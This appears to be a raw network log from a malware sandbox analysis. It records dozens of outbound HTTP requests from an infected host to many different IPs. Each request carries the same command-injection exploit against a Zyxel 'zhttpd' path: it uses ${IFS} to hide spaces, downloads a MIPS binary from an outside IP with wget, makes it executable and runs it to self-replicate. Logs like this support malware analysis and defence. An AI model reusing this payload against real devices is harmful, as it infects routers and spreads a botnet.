                                                Jan 12, 2024 18:24:51.233637094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8441192.168.2.133774424.66.93.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233673096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8442192.168.2.1342190223.96.143.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233717918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8443192.168.2.1333038169.230.119.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233773947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8444192.168.2.1337614191.203.33.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233805895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8445192.168.2.1350526173.38.135.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233825922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8446192.168.2.13533448.183.208.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233864069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8447192.168.2.133468479.29.105.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233913898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8448192.168.2.1338226182.58.219.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233944893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8449192.168.2.1360372164.94.124.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233972073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8450192.168.2.136045698.62.157.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234034061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8451192.168.2.1334524197.211.108.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234076023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8452192.168.2.1339062156.158.81.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234107971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8453192.168.2.1343732217.13.126.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234138966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8454192.168.2.134202867.72.115.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234186888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8455192.168.2.134893857.85.115.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234266043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8456192.168.2.133724279.93.112.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234293938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8457192.168.2.1342380179.3.254.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234323978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8458192.168.2.1343874133.138.15.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.234381914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8459192.168.2.135916677.186.104.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238013983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8460192.168.2.135912691.34.89.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238043070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8461192.168.2.1359512140.165.112.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238075018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8462192.168.2.1347332162.213.18.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238105059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8463192.168.2.135495439.208.206.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238147974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8464192.168.2.1360202157.85.184.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238183975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8465192.168.2.1345874113.107.30.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238218069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8466192.168.2.1355726123.74.13.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238300085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8467192.168.2.1354866174.73.223.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238332033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8468192.168.2.1349986165.189.217.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238358974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8469192.168.2.1350128148.139.31.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.238430023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8470192.168.2.134633032.178.111.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250566006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8471192.168.2.1341524109.144.232.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250631094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8472192.168.2.1356752193.171.162.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250698090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8473192.168.2.134987652.2.94.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250761032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8474192.168.2.1356938212.227.58.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250798941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8475192.168.2.1342420140.58.219.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250861883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8476192.168.2.1353866159.203.99.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250932932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8477192.168.2.135997688.53.102.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.250986099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8478192.168.2.1348588195.121.43.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251107931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8479192.168.2.1357632123.93.223.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251149893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8480192.168.2.1346856191.216.72.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251200914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8481192.168.2.1335100183.249.130.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251244068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8482192.168.2.1338714129.139.245.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251280069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8483192.168.2.1333448202.104.241.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251333952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8484192.168.2.1349340110.37.102.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251391888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8485192.168.2.1344014164.146.255.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251465082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8486192.168.2.1339540116.171.101.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251493931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8487192.168.2.1357832100.22.199.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251559019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8488192.168.2.1341232104.183.153.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251593113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8489192.168.2.1351682120.206.184.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251667023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8490192.168.2.1339622101.53.139.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251712084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8491192.168.2.134599693.227.43.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251800060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8492192.168.2.133447085.26.180.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251835108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8493192.168.2.1353990124.42.112.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251885891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8494192.168.2.1355200114.176.83.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251940012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8495192.168.2.1344098191.194.171.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.251991034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8496192.168.2.135859467.29.203.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252054930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8497192.168.2.135324259.133.110.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252101898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8498192.168.2.1340364146.134.210.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252180099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8499192.168.2.134335442.144.254.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252218962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8500192.168.2.135750827.87.155.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252274990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8501192.168.2.1350916106.98.145.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252332926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8502192.168.2.1347420209.143.98.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252396107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8503192.168.2.1349732195.247.106.204443
                                                TimestampBytes transferredDirectionData
